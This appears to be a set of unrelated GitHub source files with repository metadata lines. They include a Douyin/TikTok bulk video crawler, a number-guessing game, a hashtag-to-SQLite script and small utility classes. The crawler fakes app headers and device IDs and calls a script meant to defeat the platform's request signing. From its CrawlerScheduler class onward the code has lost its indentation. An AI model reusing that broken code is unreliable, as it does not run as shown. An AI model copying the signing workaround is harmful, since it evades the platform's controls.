        headers['user-agent'] = 'Aweme/63013 CFNetwork/978.0.7 Darwin/18.6.0'
    elif medium_type == 'image':
        file_name += '.jpg'
        file_name = file_name.replace("/", "-")
    else:
        return
    # Full local path of the target file.
    file_path = os.path.join(target_folder, file_name)
    # Skip the download when a complete local copy already exists.
    if os.path.isfile(file_path):
        # Remote size via the Content-Length header.
        remoteSize = getRemoteFileSize(medium_url)
        # Size already present on disk.
        localSize = os.path.getsize(file_path)
        if remoteSize == localSize:
            return
    print("Downloading %s from %s.\n" % (file_name, medium_url))
    retry_times = 0
    # Retry the download up to RETRY times.
    while retry_times < RETRY:
        try:
            resp = requests.get(medium_url, headers=headers,
                                stream=True, timeout=TIMEOUT)
            if resp.status_code == 403:
                # 403 is permanent: exhaust the retries and bail out.
                retry_times = RETRY
                print("Access Denied when retrieve %s.\n" % medium_url)
                raise Exception("Access Denied")
            with open(file_path, 'wb') as fh:
                for chunk in resp.iter_content(chunk_size=1024):
                    fh.write(chunk)
            break
        except:
            pass
        retry_times += 1
    else:
        # Loop exhausted without break: clean up the partial file.
        try:
            os.remove(file_path)
        except OSError:
            pass
        print("Failed to retrieve %s from %s.\n" % (uri, medium_url))
    time.sleep(1)  # throttle between downloads
# 从“分享地址”中,获取跳转页面
def get_real_address(url):
    """Resolve a v.douyin.com short link to its redirect target.

    Non-short URLs are returned untouched; None when the short link does
    not answer with a 302 redirect. Side effect: the resolved URL becomes
    the shared Referer header.
    """
    if 'v.douyin.com' not in url:
        return url
    res = requests.get(url, headers=HEADERS, allow_redirects=False)
    if res.status_code == 302:
        long_url = res.headers['Location']
        HEADERS['Referer'] = long_url
        return long_url
    return None
# 获取dytk,用于下个接口使用的字段
def get_dytk(url):
    """Fetch the share page and extract the 'dytk' token required by the
    follow-up web API calls; None when the page or the token is missing.
    """
    res = requests.get(url, headers=HEADERS)
    if not res:
        return None
    tokens = re.findall(r"dytk: '(.*)'", res.text)
    return tokens[0] if tokens else None
# 多线程下载
class DownloadWorker(Thread):
    """Worker thread that consumes (type, uri, url, folder) download jobs
    from a shared queue; runs forever (started as a daemon by the caller).
    """
    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue
    def run(self):
        while True:
            # Block until a download job is available.
            medium_type, uri, download_url, target_folder = self.queue.get()
            # Perform the actual download.
            download(medium_type, uri, download_url, target_folder)
            # task_done() lets queue.join() unblock once all jobs finish.
            self.queue.task_done()
class CrawlerScheduler(object):
def __init__(self, items):
# 需下载的文件名:被重定向的地址列表
self.file_names = {}
for i in items:
# 从“分享地址”中,获取跳转页面
url = get_real_address(i)
if url:
self.file_names[re.findall(r'v.douyin.com/(\w+)', i)[-1]] = url
if len(self.file_names) > 0:
# 初始化线程队列
self.queue = Queue.Queue()
for x in range(THREADS):
# 线程下载
worker = DownloadWorker(self.queue)
# 子线程的daemon属性为False,主线程结束时会检测该子线程是否结束,如果该子线程还在运行,则主线程会等待它完成后再退出
# 子线程的daemon属性为True,主线程运行结束时不对这个子线程进行检查而直接退出
worker.daemon = True
worker.start() # 属性daemon的值默认为False,如果需要修改,必须在调用start()方法启动线程之前进行设置
# 下载分析
self.scheduling()
# 调用js获取Signature
@staticmethod
def generateSignature(value):
p = os.popen('node fuck-byted-acrawler.js %s' % value)
return (p.readlines()[0]).strip()
# 下载分析
def scheduling(self):
for key, val in self.file_names.items():
# 用户全作品
if re.search('share/user', val):
self.download_user_videos(key, val)
# 挑战视频
elif re.search('share/challenge', val):
self.download_challenge_videos(key, val)
# 音乐
elif re.search('share/music', val):
self.download_music_videos(key, val)
# 分享单个视频
elif re.search('share/video', val):
self.download_share_videos(key, val)
# 截取视频id,下载分享视频
def download_share_videos(self, file_name, url):
item_ids = re.findall(r'share/video/(\d+)', url)
if not len(item_ids):
print("Share video #%s does not exist" % item_ids[0])
return
# 筛选视频id
item_id = item_ids[0]
video_count = self._download_share_videos_media(item_id, url, file_name)
# main线程等到其他多个线程执行完毕后再继续执行
self.queue.join()
print("\nItem share video #%s, video number %d\n\n" %
(item_id, video_count))
print("\nFinish Downloading All the videos from #%s\n\n" % item_id)
# 下载单个分享视频(添加至队列)
def _download_share_videos_media(self, item_id, url, file_name):
# 创建下载文件夹
current_folder = os.getcwd()
target_folder = os.path.join(current_folder, 'download/%s' % file_name)
if not os.path.isdir(target_folder):
os.mkdir(target_folder)
hostname = urllib.parse.urlparse(url).hostname
signature = self.generateSignature(str(item_id))
url = "https://%s/web/api/v2/aweme/iteminfo/?{0}" % hostname
params = {
'item_ids': str(item_id),
'count': '9',
'cursor': '0',
'aid': '1128',
'screen_limit': '3',
'download_click_limit': '0',
'_signature': signature
}
video_count = 0
# 获取下载列表
res = self.requestWebApi(url, params)
if res:
item_list = res.get('item_list', [])
if item_list:
for aweme in item_list:
aweme['hostname'] = hostname
video_count += 1
# 添加下载地址到队列
self._join_download_queue(aweme, target_folder)
return video_count
# 下载用户全作品
def download_user_videos(self, file_name, url):
# 获取用户id
number = re.findall(r'share/user/(\d+)', url)
if not len(number):
return
user_id = number[0]
# 获取dytk,用于下个接口使用的字段
dytk = get_dytk(f"https://www.amemv.com/share/user/{user_id}")
# 下载
video_count = self._download_user_media(user_id, dytk, url, file_name)
# main线程等到其他多个线程执行完毕后再继续执行
self.queue.join()
print("\nAweme number %s, video number %s\n\n" %
(user_id, str(video_count)))
print("\nFinish Downloading All the videos from %s\n\n" % user_id)
# 下载“分享的挑战视频”
def download_challenge_videos(self, file_name, url):
challenge = re.findall('share/challenge/(\d+)', url)
if not len(challenge):
print("Challenge #%s does not exist" % challenge[0])
return
# 获取挑战视频id
challenges_id = challenge[0]
video_count = self._download_challenge_media(challenges_id, url, file_name)
# main线程等到其他多个线程执行完毕后再继续执行
self.queue.join()
print("\nAweme challenge #%s, video number %d\n\n" %
(challenges_id, video_count))
print("\nFinish Downloading All the videos from #%s\n\n" % challenges_id)
# 下载“分享的音乐”
def download_music_videos(self, file_name, url):
music = re.findall('share/music/(\d+)', url)
if not len(music):
return
# 获取音乐id
musics_id = music[0]
video_count = self._download_music_media(musics_id, url, file_name)
# main线程等到其他多个线程执行完毕后再继续执行
self.queue.join()
print("\nAweme music @%s, video number %d\n\n" %
(musics_id, video_count))
print("\nFinish Downloading All the videos from @%s\n\n" % musics_id)
# 添加下载地址到队列
def _join_download_queue(self,aweme, target_folder):
try:
if aweme.get('video', None):
uri = aweme['video']['play_addr']['uri']
download_url = "https://aweme.snssdk.com/aweme/v1/play/?{0}"
download_params = {
'video_id': uri,
'line': '0',
'ratio': '720p',
'media_type': '4',
'vr_type': '0',
'improve_bitrate': '0',
'is_play_url': '1',
'h265': '1',
'adapt720': '1'
}
if aweme.get('hostname') == 't.tiktok.com':
download_url = 'http://api.tiktokv.com/aweme/v1/play/?{0}'
download_params = {
'video_id': uri,
'line': '0',
'ratio': '720p',
'media_type': '4',
'vr_type': '0',
'test_cdn': 'None',
'improve_bitrate': '0',
'version_code': '1.7.2',
'language': 'en',
'app_name': 'trill',
'vid': 'D7B3981F-DD46-45A1-A97E-428B90096C3E',
'app_version': '1.7.2',
'device_id': '6619780206485964289',
'channel': 'App Store',
'mcc_mnc': '',
'tz_offset': '28800'
}
url = download_url.format('&'.join([key + '=' + download_params[key] for key in download_params]))
self.queue.put(('video', aweme.get('desc', uri), url, target_folder))
else:
if aweme.get('image_infos', None):
image = aweme['image_infos']['label_large']
self.queue.put(('image', image['uri'], image['url_list'][0], target_folder))
except KeyError:
return
except UnicodeDecodeError:
print("Cannot decode response data from DESC %s" % aweme['desc'])
return
# 爬取该用户“喜欢”的作品(添加至队列)
def __download_favorite_media(self, user_id, dytk, hostname, signature, favorite_folder, video_count):
if not os.path.exists(favorite_folder):
os.makedirs(favorite_folder)
url = "https://%s/web/api/v2/aweme/like/" % hostname
params = {
'user_id': str(user_id),
'count': '21',
'max_cursor': '0',
'aid': '1128',
'_signature': signature,
'dytk': dytk
}
max_cursor = None
while True:
if max_cursor:
params['max_cursor'] = str(max_cursor)
# 获取下载列表
res = self.requestWebApi(url, params)
if not res:
# res = self.requestWebApi(url, params)
continue
favorite_list = res.get('aweme_list', [])
for aweme in favorite_list:
video_count += 1
aweme['hostname'] = hostname
# 添加下载地址到队列
self._join_download_queue(aweme, favorite_folder)
if not res.get('has_more'):
break
max_cursor = res.get('max_cursor')
return video_count
# 下载所有作品(添加至队列)
def _download_user_media(self, user_id, dytk, url, file_name):
# 新建文件夹
current_folder = os.getcwd()
target_folder = os.path.join(current_folder, 'download/%s' % file_name)
if not os.path.isdir(target_folder):
os.mkdir(target_folder)
# 判断之前是否user_id是否获取了
if not user_id:
print("Number %s does not exist" % user_id)
return
# 首次判断是否无视频,hostname可以理解为该用户的id,下面请求有用
hostname = urllib.parse.urlparse(url).hostname
if hostname != 't.tiktok.com' and not dytk:
print(url, "已无视频可以爬")
return
# 获取signature
signature = self.generateSignature(str(user_id))
url = "https://%s/web/api/v2/aweme/post/" % hostname
# 爬取第一页,每页21个视频
params = {
'user_id': str(user_id),
'count': '21',
'max_cursor': '0',
'aid': '1128',
'_signature': signature,
'dytk': dytk
}
# if hostname == 't.tiktok.com':
# params.pop('dytk')
# params['aid'] = '1180'
# 分页
# max_cursor 上一个max_cursor是下一次请求的参数,可以理解为上一个爬取视频的最后一个视频序号吧
# video_count 爬取视频总数
max_cursor, video_count = None, 0
retry_count = 0
while True:
if max_cursor:
params['max_cursor'] = str(max_cursor)
# 获取下载列表
res = self.requestWebApi(url, params)
if not res:
break
aweme_list = res.get('aweme_list', [])
for aweme in aweme_list:
video_count += 1
aweme['hostname'] = hostname
# 添加下载地址到队列
self._join_download_queue(aweme, target_folder)
# has_more:是否没有视频了
if not res.get('has_more'):
break
max_cursor = res.get('max_cursor')
# TODO: Weird result. What went wrong?
# 下载过程中爬虫失败判断
if not max_cursor:
retry_count += 1
params['_signature'] = self.generateSignature(str(user_id))
# 下载失败过多,视为爬虫失败,停止继续爬虫
if retry_count > RESULTS_VARIATION_RETRY:
print('download user media: %s, Too many failures!' %
str(user_id))
break
print('download user media: %s, result retry: %d.' %
(str(user_id), retry_count,))
# 是否爬取该用户“喜欢”的作品
if DOWNLOAD_FAVORITE:
favorite_folder = target_folder + '/favorite'
video_count = self.__download_favorite_media(
user_id, dytk, hostname, signature, favorite_folder, video_count)
if video_count == 0:
print("There's no video in number %s." % user_id)
# 返回总共下载的视频总量
return video_count
# 下载挑战视频(添加至队列)
def _download_challenge_media(self, challenge_id, url, file_name):
# 创建下载文件夹
current_folder = os.getcwd()
target_folder = os.path.join(
current_folder, 'download/#%s' % file_name)
if not os.path.isdir(target_folder):
os.mkdir(target_folder)
hostname = urllib.parse.urlparse(url).hostname
signature = self.generateSignature(str(challenge_id) + '9' + '0')
url = "https://%s/aweme/v1/challenge/aweme/" % hostname
params = {
'ch_id': str(challenge_id),
'count': '9',
'cursor': '0',
'aid': '1128',
'screen_limit': '3',
'download_click_limit': '0',
'_signature': signature
}
cursor, video_count = None, 0
while True:
if cursor:
params['cursor'] = str(cursor)
params['_signature'] = self.generateSignature(
str(challenge_id) + '9' + str(cursor))
# 获取下载列表
res = self.requestWebApi(url, params)
if not res:
break
aweme_list = res.get('aweme_list', [])
if not aweme_list:
break
for aweme in aweme_list:
aweme['hostname'] = hostname
video_count += 1
# 添加下载地址到队列
self._join_download_queue(aweme, target_folder)
if res.get('has_more'):
cursor = res.get('cursor')
else:
break
if video_count == 0:
print("There's no video in challenge %s." % challenge_id)
return video_count
# 下载音乐(添加至队列)
def _download_music_media(self, music_id, url, file_name):
if not music_id:
print("Challenge #%s does not exist" % music_id)
return
# 创建下载文件夹,音乐文件夹名字,前头带“@”,用于区别
current_folder = os.getcwd()
target_folder = os.path.join(current_folder, 'download/@%s' % file_name)
if not os.path.isdir(target_folder):
os.mkdir(target_folder)
hostname = urllib.parse.urlparse(url).hostname
signature = self.generateSignature(str(music_id))
url = "https://%s/web/api/v2/music/list/aweme/?{0}" % hostname
params = {
'music_id': str(music_id),
'count': '9',
'cursor': '0',
'aid': '1128',
'screen_limit': '3',
'download_click_limit': '0',
'_signature': signature
}
if hostname == 't.tiktok.com':
for key in ['screen_limit', 'download_click_limit', '_signature']:
params.pop(key)
params['aid'] = '1180'
cursor, video_count = None, 0
while True:
if cursor:
params['cursor'] = str(cursor)
params['_signature'] = self.generateSignature(
str(music_id) + '9' + str(cursor))
# 获取下载列表
res = self.requestWebApi(url, params)
if not res:
break
aweme_list = res.get('aweme_list', [])
if not aweme_list:
break
for aweme in aweme_list:
aweme['hostname'] = hostname
video_count += 1
# 添加下载地址到队列
self._join_download_queue(aweme, target_folder)
if res.get('has_more'):
cursor = res.get('cursor')
else:
break
if video_count == 0:
print("There's no video in music %s." % music_id)
return video_count
# 获取下载列表
def requestWebApi(self, url, params):
headers = copy.deepcopy(HEADERS)
headers['cookie'] = '_ga=GA1.2.1280899533.15586873031; _gid=GA1.2.2142818962.1559528881'
res = requests.get(url, headers=headers, params=params)
content = res.content.decode('utf-8')
print(content)
if not content:
print('\n\nWeb Api Error: %s'
'\n\nhears: %s'
'\n\nparams: %s' % (url, str(headers), str(params),))
return None
return json.loads(content)
def usage():
print("1. Please create file share-url.txt under this same directory.\n"
"2. In share-url.txt, you can specify amemv share page url separated by "
"comma/space/tab/CR. Accept multiple lines of text\n"
"3. Save the file and retry.\n\n"
"Sample File Content:\nurl1,url2\n\n"
"Or use command line options:\n\n"
"Sample:\npython amemv-video-ripper.py --urls url1,url2\n\n\n")
print(u"未找到share-url.txt文件,请创建.\n"
u"请在文件中指定抖音分享页面URL,并以 逗号/空格/tab/表格鍵/回车符 分割,支持多行.\n"
u"保存文件并重试.\n\n"
u"例子: url1,url12\n\n"
u"或者直接使用命令行参数指定链接\n"
u"例子: python amemv-video-ripper.py --urls url1,url2")
# 获取“分享地址”
# 找到一个文字编辑器,然后打开文件share-url.txt
# 把你想要下载的抖音号分享链接编辑进去,以逗号/空格/tab/表格鍵/回车符分隔,可以多行.例如, 这个文件看起来是这样的:
def parse_sites(fileName):
    """Read share URLs from *fileName*.

    The file may separate URLs with commas, spaces, tabs or newlines (any
    mix, multiple lines). Returns the non-empty tokens in file order.
    """
    with open(fileName, "rb") as f:
        raw = f.read()
    # Decode first, then normalize every separator to a comma.
    text = raw.decode("utf-8").strip()
    for sep in ("\t", "\r", "\n", " "):
        text = text.replace(sep, ",")
    return [token.strip() for token in text.split(",") if token.strip()]
# 获取“分享地址”的文件路径
def get_content(filename):
    """Return the share URLs parsed from *filename*; when the file is
    missing, print the usage help and terminate with exit code 1."""
    if not os.path.exists(filename):
        # No URL file available: explain how to provide one and bail out.
        usage()
        sys.exit(1)
    return parse_sites(filename)
if __name__ == "__main__":
content, opts, args = None, None, []
try:
# getopt.getopt()为了从外部输入不同的命令行选项时,对应执行不同的功能
opts, args = getopt.getopt(sys.argv[1:], "hi:o:", ["favorite", "urls=", "filename="])
except getopt.GetoptError:
# 无法调出地址
usage()
# sys.exit([args])的参数解析
# 意思就是参数为数字的时候,和 shell 退出码意义是一样的,sys.exit(2)和sys.exit(1)只是为了区分结束原因
# 0 :成功结束
# 1 :通用错误
# 2 :误用Shell命令
sys.exit(2)
# 命令行中提取地址到content
for opt, arg in opts:
if opt == "--favorite":
DOWNLOAD_FAVORITE = True
elif opt == "--urls":
content = arg.split(",")
elif opt == "--filename":
content = get_content(arg)
# 从文件中提取下载地址到content
if content == None:
# 找到一个文字编辑器,然后打开文件share-url.txt
content = get_content("share-url.txt")
# 没有需要下载就关闭
if len(content) == 0 or content[0] == "":
# 无法调出地址
usage()
sys.exit(1)
# 执行下载程序
CrawlerScheduler(content)
| NearHuiwen/TiktokCrawler | amemv-video-ripper.py | amemv-video-ripper.py | py | 24,868 | python | en | code | 43 | github-code | 90 |
27665823847 |
class MultiResultSet(object):
    """Mutable holder for one query result set.

    :meth:`update` exposes every truthy value of the raw result dict as an
    attribute named after its (stringified) key.
    """
    def __init__(self, entities):
        # entities: opaque sequence describing the selected entities
        self._entities = entities
        self.raw = None           # copy of the last raw result dict
        self.measurement = ""     # measurement name from the last update
    def update(self, measurement, data):
        """Record *measurement* and a copy of *data*, attaching each truthy
        value as an attribute; falsy values are skipped."""
        self.measurement = measurement
        self.raw = data.copy()
        for key, value in self.raw.items():
            if value:
                # builtin setattr replaces the explicit __setattr__ dunder call
                setattr(self, str(key), value)
| museghost/influxalchemy | influxalchemy/resultset.py | resultset.py | py | 365 | python | en | code | null | github-code | 90 |
44669472709 | import random
# Number-guessing game: the player has up to 5 attempts ("hak") to find x.
x = int(random.randrange(5,100))  # secret number in [5, 99]; int() is redundant but kept
print(x)  # NOTE(review): prints the secret -- presumably a leftover debug print, confirm
hak = int(input("Kaç Hakkınızın OLmasını İstersiniz :"))
if hak>5:
    print("5 den daha hazla hak a sahip olmazsınız.")
    # Re-prompt until the player picks at most 5 attempts.
    while hak >5:
        hak = int(input("Kaç Hakkınızın OLmasını İstersiniz :"))
a = 0
while hak >0:
    a = int(input("Lutfen bir sayi giriniz : "))
    if a<x:
        print("Girdiginiz sayidan daha B Ü Y Ü K bir deger giriniz!")
    elif a==x :
        print(f"Tebrikler Buldunuz sayi {x}")
        break  # guessed correctly; remaining attempts stay in hak
    else:
        print("Girdiginiz sayidan daha K Ü Ç Ü K bir deger giriniz")
    hak-= 1
if hak ==0 and a!=x:
    print("Ne yazık ki oyunu kaybettiniz->")
# Score: 20 points per attempt spent. NOTE(review): also printed after a
# loss (hak == 0 gives 100) -- confirm that is intended.
p =(5-hak)*20
print(f"Tolam Puanınız ({p}")
| osmanozden/basic_python_fundamental | loops_MY_FİRS_GAME.py | loops_MY_FİRS_GAME.py | py | 718 | python | tr | code | 0 | github-code | 90 |
37845781990 | import numpy as np
import pandas as pd
import re
import sqlite3
# import data from csv file
df1 = pd.read_csv('sample.csv')
# pre-processing
df1.drop(columns=['Sticker taps', 'Content type', 'Replies', 'Results', 'Cost per result'], inplace=True)
# df1['Post time'] = pd.to_datetime(df1['Post time'])
df1 = df1.loc[df1['Caption'] != '***** updated their cover photo.'].reset_index(drop=True)
df1.insert(loc=0, column='postID', value=range(1, len(df1) + 1))
df1 = df1.reset_index(drop=True)
df1['postID'] = df1['postID'].astype(str)
# create a DataFrame for each table in a database file
dict_df2 = {'tagID':[], 'campaigns':[]}
dict_df3 = {'pk_postsAndTags':[], 'postID':[], 'tagID':[]}
# dict_df4 = {'tagID':[], 'courseName':[]}
# dict_df5 = {'customerID':[], ...}
# extract tags from Caption (exclude Thai language)
# indicate regular expression
pattern = re.compile('#[a-zA-Z0-9]+[\w$]') # indicate REGEX for retrieve tags
# Extract tags for each post into a new table
for index, row in df1.iterrows(): # find tags for each post (each row)
result = pattern.findall(df1['Caption'][index]) # get tags from a comment column and get into a list
lower_result = [e.lower() for e in result] # lowering case tags to make it consistent
lower_result_remove_duplicate = list(set(lower_result)) # remove duplicated tags for each post
if len(lower_result_remove_duplicate) != 0: # if post contains any tag
# lower_result is a list containing tags for each post; [#tag1, #tag2, #tag3, ...]
for e in lower_result_remove_duplicate: # for each tag in a post
if e not in dict_df2['campaigns']: # if tag is not in record before, record it as a new one
tag_id = len(dict_df2['tagID'])+1
dict_df2['tagID'].append(str(tag_id))
dict_df2['campaigns'].append(e)
# define elements before inserting it to be the data
postid = df1['postID'][index]
i = dict_df2['campaigns'].index(e)
tagid = dict_df2['tagID'][i]
temp_tuple = str(tuple([postid, tagid]))
# insert elements to be the data
dict_df3['pk_postsAndTags'].append(temp_tuple)
dict_df3['postID'].append(postid)
dict_df3['tagID'].append(tagid)
df2 = pd.DataFrame(dict_df2)
df3 = pd.DataFrame(dict_df3)
# export as a database file
connection = sqlite3.connect('sample.db')
# define a function for query execution
def execute_query(connection, query):
    """Execute a single SQL statement on *connection* and commit.

    Failures are reported, not raised: the handler now catches
    sqlite3.Error -- the driver never raises OSError, so the original
    except clause could never fire and errors escaped uncaught.
    """
    cursor = connection.cursor()
    try:
        cursor.execute(query)
        connection.commit()
        print("Query successful")
    except sqlite3.Error as err:
        print(f"Error: '{err}'")
def insert_row(connection, query, row):
    """Execute a parameterized statement with *row* bound to the
    placeholders, then commit.

    Catches sqlite3.Error (the exceptions sqlite3 actually raises) instead
    of OSError, so failures are reported as intended.
    """
    cursor = connection.cursor()
    try:
        cursor.execute(query, row)
        connection.commit()
        print("Query successful")
    except sqlite3.Error as err:
        print(f"Error: '{err}'")
# the database will consist of 3 tables; posts, postAndTags, campaigns
# create tables in database
query1_1 = '''
CREATE TABLE IF NOT EXISTS posts (
postID TEXT,
postTime TEXT, -- need to be transformed to DATETIME later
caption TEXT,
reach INT,
likesAndReactions INT,
postClicks INT,
comments INT,
shares INT,
PRIMARY KEY (postID)
);
'''
query2_1 = '''
CREATE TABLE IF NOT EXISTS campaigns (
tagID TEXT,
campaign TEXT,
PRIMARY KEY (tagID)
);
'''
# Bridge table
query3_1 = '''
CREATE TABLE IF NOT EXISTS postsAndTags (
pk_postsAndTags TEXT,
postID TEXT REFERENCES posts(postID),
tagID TEXT REFERENCES campaigns(tagID),
PRIMARY KEY (pk_postsAndTags)
);
'''
# query4 =
execute_query(connection, query1_1)
execute_query(connection, query2_1)
execute_query(connection, query3_1)
# insert data into tables
query1_2 = '''
INSERT INTO posts (postID, postTime, caption, reach, likesAndReactions, postClicks, comments, shares)
VALUES (?, ?, ?, ?, ?, ?, ?, ?);
'''
query2_2 = '''
INSERT INTO campaigns (tagID, campaign)
VALUES (?, ?);
'''
query3_2 = '''
INSERT INTO postsAndTags (pk_postsAndTags, postID, tagID)
VALUES (?, ?, ?);
'''
for index, row in df1.iterrows():
insert_row(connection, query1_2, tuple(row))
for index, row in df2.iterrows():
insert_row(connection, query2_2, tuple(row))
for index, row in df3.iterrows():
insert_row(connection, query3_2, tuple(row))
connection.close() | Patcharanat/Marketing-Dashboard | marketing_dashboard_script.py | marketing_dashboard_script.py | py | 4,454 | python | en | code | 1 | github-code | 90 |
24333941495 | import logging
from .analyzer import Analyzer
from ..matrix.geomatrix import GeoMatrix, PersistentGeoMatrix
L = logging.getLogger(__name__)
class GeoAnalyzer(Analyzer):
	'''
	Analyzer for events carrying a geographical-point dimension.

	`GeoAnalyzer` operates over a `GeoMatrix` object: pass `matrix_id` to
	reuse a matrix already registered with the pump service, or leave it
	None to have a new matrix created (optionally persistent).
	'''
	# Default bounding box, roughly covering Europe.
	ConfigDefaults = {
		"max_lat": 71.26,  # Europe endpoints
		"min_lat": 23.33,
		"min_lon": -10.10,
		"max_lon": 40.6,
	}
	def __init__(self, app, pipeline, matrix_id=None, dtype="float_", analyze_on_clock=False, bbox=None, resolution=5, persistent=False, id=None, config=None):
		super().__init__(app, pipeline, analyze_on_clock=analyze_on_clock, id=id, config=config)
		svc = app.get_service("bspump.PumpService")
		if matrix_id is None:
			# No matrix supplied: create one named "<analyzer id>Matrix".
			g_id = self.Id + "Matrix"
			if bbox is None:
				# Fall back to the default (Europe) bounding box.
				bbox = {
					"min_lat": float(self.ConfigDefaults["min_lat"]),
					"max_lat": float(self.ConfigDefaults["max_lat"]),
					"min_lon": float(self.ConfigDefaults["min_lon"]),
					"max_lon": float(self.ConfigDefaults["max_lon"]),
				}
			if persistent:
				self.GeoMatrix = PersistentGeoMatrix(app, dtype, bbox=bbox, resolution=resolution, id=g_id, config=config)
			else:
				self.GeoMatrix = GeoMatrix(app, dtype, bbox=bbox, resolution=resolution, id=g_id, config=config)
			svc.add_matrix(self.GeoMatrix)
		else:
			# Reuse an already-registered matrix.
			self.GeoMatrix = svc.locate_matrix(matrix_id)
| pypi-buildability-project/BitSwanPump | bspump/analyzer/geoanalyzer.py | geoanalyzer.py | py | 1,438 | python | en | code | null | github-code | 90 |
40746228755 | import re
class CatalPhoto(object):
    """Represents a photo in the Catalhoyuk archive.

    Attributes:
        url: photo URL as a string.
        record_id: numeric id parsed from the URL's original=/preview= query.
        is_labeled: whether a whiteboard annotation was supplied.
        has_whiteboard / is_difficult: annotation flags; None when unlabeled.
    """
    # Regex for extracting record ID from a URL
    record_id_re = re.compile(r'(original|preview)=(\d+)', flags=re.IGNORECASE)
    def __init__(self, url, annotation=None):
        self.url = str(url)
        self.record_id = int(self.record_id_re.search(url).group(2))
        if annotation is not None:
            # Normalize once: previously is_difficult compared the raw
            # annotation to lowercase 'y'/'n', so "Y" was wrongly difficult.
            ann = annotation.lower()
            self.is_labeled = True
            self.has_whiteboard = ann.startswith('y')
            self.is_difficult = ann != 'y' and ann != 'n'
        else:
            self.is_labeled = False
            # Defined so unlabeled photos don't raise AttributeError downstream.
            self.has_whiteboard = None
            self.is_difficult = None
| chrischute/catal | catal/catal_photo.py | catal_photo.py | py | 629 | python | en | code | 0 | github-code | 90 |
17419482192 |
import os, pprint
from krrt.utils import get_file_list, write_file
from data import *
forbidden_files = ['__init__', 'api.py']
def get_name(dom):
    """Strip the IPC suffix decorations from a domain directory path and
    return the bare domain name (e.g. './rovers-strips' -> 'rovers')."""
    known_suffixes = ('-sat', '-opt', '-strips', '-fulladl', '-06', '-08',
                      '-00', '-02', '98', '00', '-simpleadl', '-adl')
    base = dom.split('/')[-1]
    for suffix in known_suffixes:
        base = base.split(suffix)[0]
    if not base:
        print ("Error: empty name from %s" % dom)
    return base
def handle_single(dom):
    """Write an api.py manifest for a domain directory that has a single
    shared domain.pddl, pairing it with every problem file found.

    Special-cased domains (freecell, satellite) span two IPC editions and
    therefore emit two domain entries.
    """
    towrite = 'domains = [\n'
    extra_domain = False
    domdata = {}
    domdata['name'] = get_name(dom)
    domdata['description'] = domain_description[get_name(dom)]
    # Special Cases:
    # IPC-2000: freecell (non-pfiles)
    # IPC-2002: satellite (p#-pfile#.pddl)
    # IPC-2002: freecell (pfile#)
    if './freecell' == dom:
        extra_domain = True
        # [2:] strips the leading './' from every emitted path.
        domdata['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['pfile','/domain.pddl']))]
        domdata['ipc'] = '2000'
        domdata2 = {}
        domdata2['name'] = domdata['name']
        domdata2['description'] = domain_description[get_name(dom)]
        domdata2['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl'], match_list=['pfile']))]
        domdata2['ipc'] = '2002'
    elif './satellite' == dom:
        extra_domain = True
        domdata['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl']))]
        domdata['ipc'] = ipc_map.get(dom[2:])
        domdata2 = {}
        domdata2['name'] = domdata['name']
        domdata2['description'] = domain_description[get_name(dom)]
        # '-HC-' problems belong only to the first entry.
        domdata2['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl','-HC-']))]
        domdata2['ipc'] = '2002'
    else:
        domdata['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl','/domain-nosplit.pddl','/orig-domain.pddl']))]
        domdata['ipc'] = ipc_map.get(dom[2:])
    towrite += pprint.pformat(domdata)
    if extra_domain:
        towrite += ',\n'
        towrite += pprint.pformat(domdata2)
    towrite += '\n]'
    #print "To be printed:\n-------"
    #print towrite
    #print "-------\n"
    print ("Handling single domain: %s" % dom)
    write_file(dom+'/api.py', towrite)
def handle_double(dom):
    """Write an api.py manifest for a domain directory that ships one
    domain file per problem file.

    Handles the balanced case (matching domain/problem names) and the
    50-problem layout of psr-small/airport; anything else is reported and
    left without a manifest.
    """
    towrite = 'domains = [\n'
    domdata = {}
    domdata['name'] = get_name(dom)
    domdata['description'] = domain_description[get_name(dom)]
    domfiles = get_file_list(dom, match_list=['domain'], forbidden_list=forbidden_files)
    prbfiles = get_file_list(dom, forbidden_list=forbidden_files+['domain'])
    if len(domfiles) == len(prbfiles):
        def remdom(dom):
            # Strip the 'domain' marker from a domain file name so it can
            # be matched against its problem file.
            toret = dom
            for s in ['-domain', 'domain_']:
                toret = ''.join(toret.split(s))
            return toret
        dmap = {remdom(d): d for d in domfiles}
        if all([k in prbfiles for k in dmap]):
            print ("Handling multi-domain: %s" % dom)
            assert len(set(dmap.keys())) == len(set(prbfiles))
            domdata['problems'] = [(dmap[prob][2:], prob[2:]) for prob in sorted(prbfiles)]
            domdata['ipc'] = ipc_map.get(dom[2:])
        elif dom in ['./psr-small', './airport']:
            print ("Handling custom 50-problem domain: %s" % dom)
            assert 100 == len(get_file_list(dom, match_list=['pddl'], forbidden_list=forbidden_files))
            probs = []
            # Pair pNN-domain with pNN- for each of the 50 problems.
            for i in range(1,51):
                d = get_file_list(dom, match_list=["p%02d-domain" % i], forbidden_list=forbidden_files)
                p = get_file_list(dom, match_list=["p%02d-" % i], forbidden_list=forbidden_files+['domain'])
                assert 1 == len(d), str(d)
                assert 1 == len(p), str(p)
                probs.append((d[0][2:], p[0][2:]))
            domdata['problems'] = sorted(probs)
            domdata['ipc'] = ipc_map.get(dom[2:])
        else:
            print ("Unhandled balanced multi-domain: %s" % dom)
            return
    else:
        print ("Unhandled lopsided multi-domain: %s" % dom)
    towrite += pprint.pformat(domdata)
    towrite += '\n]'
    #print "To be printed:\n-------"
    #print towrite
    #print "-------\n"
    write_file(dom+'/api.py', towrite)
# Classify every domain directory and generate api.py metadata for those
# that do not have one yet.
domains = get_file_list('.', forbidden_list=['.py'])

single_dom = []
multi_dom = []
done_dom = []

print()  # bug fix: a bare `print` statement is a no-op expression in Python 3
for dom in domains:
    if os.path.isfile(dom+'/api.py'):
        done_dom.append(dom)
    elif os.path.isfile(dom+'/domain.pddl'):
        single_dom.append(dom)
